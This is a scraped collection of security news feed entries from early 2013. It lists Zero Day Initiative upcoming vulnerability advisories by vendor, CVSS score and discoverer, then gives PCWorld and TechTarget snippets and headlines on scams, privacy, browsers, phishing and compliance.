http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'nullPtr Crew' was reported to the affected vendor on: 2013-01-07, 46 days ago. The vendor is given until 2013-07-06 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1704: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2013-01-07, 46 days ago. The vendor is given until 2013-07-06 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1689: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-01-07, 46 days ago. The vendor is given until 2013-07-06 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1678: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-01-07, 46 days ago. The vendor is given until 2013-07-06 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1579: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Luigi Auriemma' was reported to the affected vendor on: 2013-01-07, 46 days ago. The vendor is given until 2013-07-06 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1667: Adobe

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tobias Klein' was reported to the affected vendor on: 2012-11-21, 93 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1601: Adobe

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Soroush Dalili' was reported to the affected vendor on: 2012-11-21, 93 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1595: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 8.5 (AV:N/AC:L/Au:N/C:C/I:P/A:N) severity vulnerability discovered by 'Mak Kolybabi' was reported to the affected vendor on: 2012-11-21, 93 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1591: Mozilla

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'regenrecht' was reported to the affected vendor on: 2012-11-21, 93 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1589: Mozilla

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'regenrecht' was reported to the affected vendor on: 2012-11-21, 93 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1578: MySQL

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Luigi Auriemma' was reported to the affected vendor on: 2012-11-21, 93 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1571: Mozilla

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'regenrecht' was reported to the affected vendor on: 2012-11-21, 93 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1559: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Nicolas Gregoire' was reported to the affected vendor on: 2012-11-21, 93 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1551: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N) severity vulnerability discovered by 'Francis Provencher From Protek Research Lab's' was reported to the affected vendor on: 2012-11-21, 93 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the

==> ZDI-CAN-1546: IBM

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Alexander Gavrun' was reported to the affected vendor on: 2012-11-21, 93 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1545: IBM

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Alexander Gavrun' was reported to the affected vendor on: 2012-11-21, 93 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1544: IBM

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Alexander Gavrun' was reported to the affected vendor on: 2012-11-21, 93 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1517: WebKit.Org

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'pa_kt / twitter.com/pa_kt' was reported to the affected vendor on: 2012-11-21, 93 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1516: WebKit.Org

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'pa_kt / twitter.com/pa_kt' was reported to the affected vendor on: 2012-11-21, 93 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1687: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1668: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1664: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1663: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1662: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9.7 (AV:U/AC:U/Au:N/C:C/I:N/A:N) severity vulnerability discovered by 'rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1661: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:C/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1660: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1659: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1650: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1647: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1646: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1644: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1643: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1641: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'G. Geshev' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1628: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1620: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tobias Klein' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1615: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1614: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1613: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1612: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1611: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1607: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1606: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1603: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tom Gallagher & Paul Bates' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1566: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1518: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tobias Klein' was reported to the affected vendor on: 2012-11-14, 100 days ago. The vendor is given until 2013-05-13 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1577: Adobe

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-10-24, 121 days ago. The vendor is given until 2013-04-22 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1433: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-08-21, 185 days ago. The vendor is given until 2013-02-17 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1339: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Luigi Auriemma' was reported to the affected vendor on: 2012-08-21, 185 days ago. The vendor is given until 2013-02-17 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1568: Cisco

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tenable Network Security' was reported to the affected vendor on: 2012-07-24, 213 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1536: Cisco

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Nenad Stojanovski' was reported to the affected vendor on: 2012-07-24, 213 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1535: Cisco

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Nenad Stojanovski' was reported to the affected vendor on: 2012-07-24, 213 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1527: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'James Burton' and ' Insomnia Security' was reported to the affected vendor on: 2012-03-14, 345 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1510: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-03-14, 345 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1509: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-03-14, 345 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> Don’t fall for the Facebook privacy notice hoax

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Have you posted the notice to your Facebook timeline to proclaim your copyright ownership of all content? Have you seen others from your social network posting such a notice? If you havent already, dont bother. Its a hoax. Its not even a new hoax. Its a resurgence of an old hoax that many users fell for earlier this year when Facebook became a publicly-traded company. The previous hoax implied that the change from a private company to a public one somehow changed the rules of the privacy agreement and put your posts and photos at risk unless you posted a copy and paste of a disclaimer establishing your copyright ownership. You can't change the Facebook legal terms by posting on your timeline. The new one reads: In response to the new Facebook guidelines I hereby declare that my copyright is attached to all of my personal details, illustrations, paintings, writing, publications, photos and videos, etc. (as a result of the Berne Convention). To read this article in full or to leave a comment, please click here

==> With shopping scams on the rise, watch for these threats

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Tomorrow is Thanksgiving, which means only one thingthe glorious chaos we call the Holiday Shopping Season will soon be upon us. Holiday shopping also means a spike in online scams, fraud, and malware, so you need to be aware of the risks and threats, and exercise some common sense to avoid a cyber-Grinch incident. Intrepid shoppers will line up for Black Friday deals that have spilled over to Thanksgiving Thursday. You can now start your Black Friday shopping between the turkey feast and the pumpkin pie, before the football games are even over on Thanksgiving Day. The definition of Friday aside, holiday shopping will officially be underway. Black Friday will be followed by Cyber Monday, and many shoppers will turn to their mobile devices to find great deals, so its primetime for cybercriminals. Be careful what apps you install and what you click on from your mobile device. Rising threat of mobile scams and malware Black Friday is generally an in-person, brick-and-mortar-store shopping experience, but competition from online retailers and Cyber Monday, combined with the explosion of connected shoppers armed with mobile devices, has changed the game. A report from iovation, a mobile device security and reputation management company, claims that online retail transactions from mobile devices have increased 300 percent over last year. Mobile transactions accounted for nearly one in ten purchases in the most recent quarter, and that number is expected to spike up for holiday shopping. To read this article in full or to leave a comment, please click here

==> US teens lead the way for shady, risky online behavior

http://feeds.pcworld.com/pcworld/blogs/security_alert/ What does your teen do when he or she is online? Do you know? Teens in general partake in riskier online behavior than your average user, but according to a recent study from McAfeeExploring the Digital Divideteens in the United States are even more likely to engage in shady online activities. The new report is a follow up to McAfees The Digital Divide: How the Online Behavior or Teens Is Getting Past Parents, released earlier this year. The original survey focused solely on the United States, but the new one expands the scope to include teens in European countries for comparison. The results might be a bit discouraging for parents of US teens. Teens in the United States lead in almost every category of shady online behavior. Nearly a third of US teens have used the Web to intentionally surf for bleep. US teens also lead in using mobile devices to cheat on tests, and are tied for second in using the Internet as a platform for cyber bullyingonly half a percentage point behind the Netherlands. Go USA? To read this article in full or to leave a comment, please click here

==> Here's how to secure your email and avoid becoming a ‘Petraeus’

http://feeds.pcworld.com/pcworld/blogs/security_alert/ It was a shock when David Petraeusa respected and highly-decorated Army generalabruptly stepped down from his post as the director of the CIA earlier this week. It was even more of a jolt to learn that his resignation was due to an extramarital affair. But, the real story might be the fact that the affair came to light more or less accidentally as a result of poor email and privacy practices. First, a little background on how things went down. The affair between David Petraeus and his biographer Paula Broadwell seems like something from the Showtime series Homeland, or perhaps a James Bond plot line, but the events that led to the FBI investigation that uncovered the affair are a bit more Fatal Attraction. Broadwell sent anonymous threatening emails to another woman she considered to be competition for Petraeus affection, and that womanJill Kelleyinitiated the investigation that eventually unraveled the affair and led to the downfall of one of this generation's greatest American heroes. I dont want to teach anyone how to cover their illicit tracks better, or how to have a more clandestine affair, but lets take a look at where Petraeus and Broadwell went wrong so you can understand how to cover your tracks better in general, and how to secure your email and protect your privacy online. To read this article in full or to leave a comment, please click here

==> Out of date, vulnerable browsers put users at risk

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Is your browser up to date? According to the results of a new survey from Kasperskya security software vendornearly a quarter of the browsers currently in use are out of date. Surfing the Web with a vulnerable browser is a recipe for disaster. The Web browser has evolved to become the primary software used on many PCs. People access their email, surf websites, create documents and spreadsheets, access cloud-based file storage and sharing sites, and share with others on social networking sitesall through the browser. Attackers no this as well, which is why it is exceptionally risky to use a browser with known vulnerabilities. Kaspersky gathered anonymous data through its cloud-based Kaspersky Security Network. Kaspersky researchers analyzed the browser usage data from millions of customers around the world, and uncovered some concerning trends. * 23 percent of browsers are not current: 14.5 percent are still using the previous version, while 8.5 percent are using even older, obsolete versions. * When a new version of a browser is released, it can take nearly 10 days for it to surpass the previous version in usage, and an average of about a month for a majority of users to upgrade. Keep your browser up to date to avoid Web-based attacks. The major browsers all have automatic update mechanisms in place. The easiest way to make sure your browser is current is to enable the automatic updates and let them do what theyre meant to dokeep your browser up to date without requiring you to manage the process yourself. To read this article in full or to leave a comment, please click here

==> Study finds 25 percent of Android apps to be a security risk

http://feeds.pcworld.com/pcworld/blogs/security_alert/ According to a new report from Bit9a security vendor with a focus on defending against advanced persistent threats (APT)there is a one in four chance that downloading an Android app from the official Google Play market could put you at risk. Bit9 analyzed 400,000 or so apps in Google Play, and found over 100,000 it considers to be on the shady side. Does that mean that the sky is falling, and everyone with an Android smartphone or tablet should abandon it immediately? No. The research by Bit9 illustrates some issues with app development in general, and should raise awareness among mobile users to exercise some discretion when downloading and installing apps, but its not a sign of any urgent crisis affecting Android apps. Use discretion rather than blindly granting permissions to apps. The report from Bit9 isnt about apps that contain malware, or are even overtly malicious for that matter. Bit9 reviewed the permissions requested by the apps, and examined the security and privacy implications of granting those permissions. The reality is that many apps request permission to access sensitive content they have no actual need for. Bit9 says that 72 percent of all Android apps in the Google Play market request access to at least one potentially risky permission. For example, 42 percent request access to GPS location data, 31 percent want access to phone number and phone call history, and 26 percent ask for permission to access personal information. Bit9 discovered 285 apps that use 25 or more system permissions. To read this article in full or to leave a comment, please click here

==> Bad outsourcing decisions cause 63% of data breaches

http://feeds.pheedo.com/tt/1323 Bad outsourcing decisions nearly two-thirds of data breaches investigated by security firm Trustwave in the past year Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Cyber attacks on trust could cost top firms $398m, says Ponemon

http://feeds.pheedo.com/tt/1323 Every Global 2000 organisation faces $398m in potential losses from new and evolving attacks on their ability to control trust with cryptographic keys and digital certificates, a study has revealed Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Audits and compliance requirements for cloud computing

http://feeds.pheedo.com/tt/1323 Even as India Inc experiments with the cloud, security concerns play spoilsport. These cloud computing audit and compliance tips will make your journey easier. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Cutwail botnet spam campaign tied to Zeus banking Trojan

http://feeds.pheedo.com/tt/1323 The cybercriminals connected to the notorious Zeus Trojan are using the Cutwail botnet to distribute spam designed to steal account credentials. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> PCI validation: Requirements for merchants covered by PCI DSS

http://feeds.pheedo.com/tt/1323 Mike Chapple details the PCI validation requirements for merchants covered by PCI DSS. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> VoIP security strategy helps WNS tackle cross-party risk

http://feeds.pheedo.com/tt/1323 Indian BPO major WNS ensures robust risk management and PCI-DSS compliance through simple VoIP security solution, despite outdated client infrastructure. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Analysis: Windows 8 security features improve on Windows 7 security

http://feeds.pheedo.com/tt/1323 Expert Michael Cobb says Windows 8's security features, like Windows Defender and Secure Boot, are a step forward for desktop and BYOD security. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Study finds spear phishing at heart of most targeted attacks

http://feeds.pheedo.com/tt/1323 Malicious file attachments are typically used as the payload, according to a report issued this week by Trend Micro. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Security business analyst – a role whose time has come

http://feeds.pheedo.com/tt/1323 For effective information security, India Inc requires security business analysts. These should be people who understand security, technology and the business. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Mitigate phishing attacks in the cloud: A how-to

http://feeds.pheedo.com/tt/1323 As Indian enterprises increasingly move to the cloud, so are phishing attempts. Here are some ways to mitigate the risks of phishing in the cloud. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Study finds most antivirus products ineffective

http://feeds.pheedo.com/tt/1323 Slow updates to signature databases cause some antivirus products to be ineffective against known threats, according to a study by security firm Imperva. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Zenmap tutorial: Mapping networks using Zenmap profiles

http://feeds.pheedo.com/tt/1323 Video: In this Zenmap tutorial screencast, Keith Barker of CBT Nuggets explains how to efficiently map networks graphically using Zenmap profiles. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Combat social engineering attacks with these mantras

http://feeds.pheedo.com/tt/1323 Of all the security threats, those involving the human angle are perhaps the deadliest. Keep social engineering at bay with these tips. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Phishing attack, stolen credentials sparked South Carolina breach

http://feeds.pheedo.com/tt/1323 A phishing attack and stolen credentials gave an attacker access to the systems of the South Carolina Department of Revenue for two months. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Cloud security begins with the contract, says expert

http://feeds.pheedo.com/tt/1323 Enterprises must empower their legal teams to ask the right questions and write contracts based on risk management, explains Tom Kellermann of Trend Micro. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Deception, proactive defenses can better protect IP, says expert

http://feeds.pheedo.com/tt/1323 Deceptive environments, phony data in the enterprise can fool attackers and increase the cost of hacking, says noted cybersecurity expert Paul Kurtz. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> After antimalware: Moving toward endpoint antivirus alternatives

http://feeds.pheedo.com/tt/1323 Is it time to "cut the cord" with endpoint antimalware? Matthew Pascucci discusses possible antivirus alternatives. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> PCI Council: Risk assessment methodology unique to company environment

